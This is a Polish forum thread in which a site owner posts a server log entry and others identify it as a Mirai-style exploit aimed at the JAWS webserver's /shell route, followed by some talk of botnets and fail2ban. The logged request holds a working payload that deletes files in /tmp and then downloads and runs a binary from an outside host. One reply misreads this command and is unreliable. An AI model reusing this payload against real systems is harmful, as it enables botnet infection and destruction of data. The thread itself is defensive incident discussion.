Hel-lo wszystkim

Jeśli macie a pewnie niektórzy maja z pewnościa ..

co to może być ?

GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-"

wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie.
Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy ....

Macie jakieś wytłumaczenie ?

Pozdrówka
phpamator

wyglada na to ze twoja strona ma routing o nazwie "shell" ktory pozwala na wykonanie komend na serwerze pobranych z adresu URL. Jesli to prawda to twoja strona jest jak otwarte drzwi do domu dla wlamywacza

Próba wykonania komend systemowych przez skrypt 'shell' tak jak nospor wyżej pisał, a dokładniej to atakujący chciał usunac jakies pliki z koncowka *.wget, plik jaws;sh z katalogu kreekxassa.ml i plik jaws w /tmp, sprawdz profilaktycznie czy nie masz jakichs sladow z tymi plikami, jesli masz to masz zainfekowaną stronę i mozliwe ze caly serwer.

Podpytałem trochę naszych adminów bo już gdzieś mi się podobny link obił o oczy. To działanie exploitów oparte na kodzie Mirai, który w w Twoim przypadku chce dokonać nieautoryzowanego polecenia powłoki przez serwer Webserwer JAWS. Generalnie ataki tych exploitów (i pochodnych Mirai) zostały stworzone pierwotnie do ataków na IOT (internet rzeczy) w celu zainfekowania ich jak najwięcej ( w sensie np. ruterów czy serwerów sprzętowych) i utworzenia z nich sieci zdalnych botnetów do ataków na dużą skalę.
Pochodne Mirai niestety ciągle ewaluowują i np. któraś wersja Mirai wykorzystuje exploita Spring4Shell do infekowania podatnych serwerów internetowych i rekrutowania ich do ataków DDoS. Jest tego syfu znacznie więcej, tworząc kampanie i zestawy exploitów: Omni, Okai, Hakane itp.
Warto o tym poczytać.

ale tu nie ma co się przejmować zapytanie według tego logu zwrocilo kod 400 czyli błąd...

Jak dostaniesz ileśtam tysięcy takich wywołań w krótkim czasie to położy serwer a mi bardziej chodziło o trochę przydatnych informacji. Tutaj owszem dostał 400 bo jak pisałem to dotyczyło wywołania powłoki shella serwera JAWS.

fail2ban?

fail2ban nie chroni przed atakami brutal force rozproszonymi, np.z sieci zdalnych botnetów. W zasadzie chyba każde narzędzie z większym skorelowanym atakiem sobie nie poradzi. To tylko kwestia ilości rządań w czasie.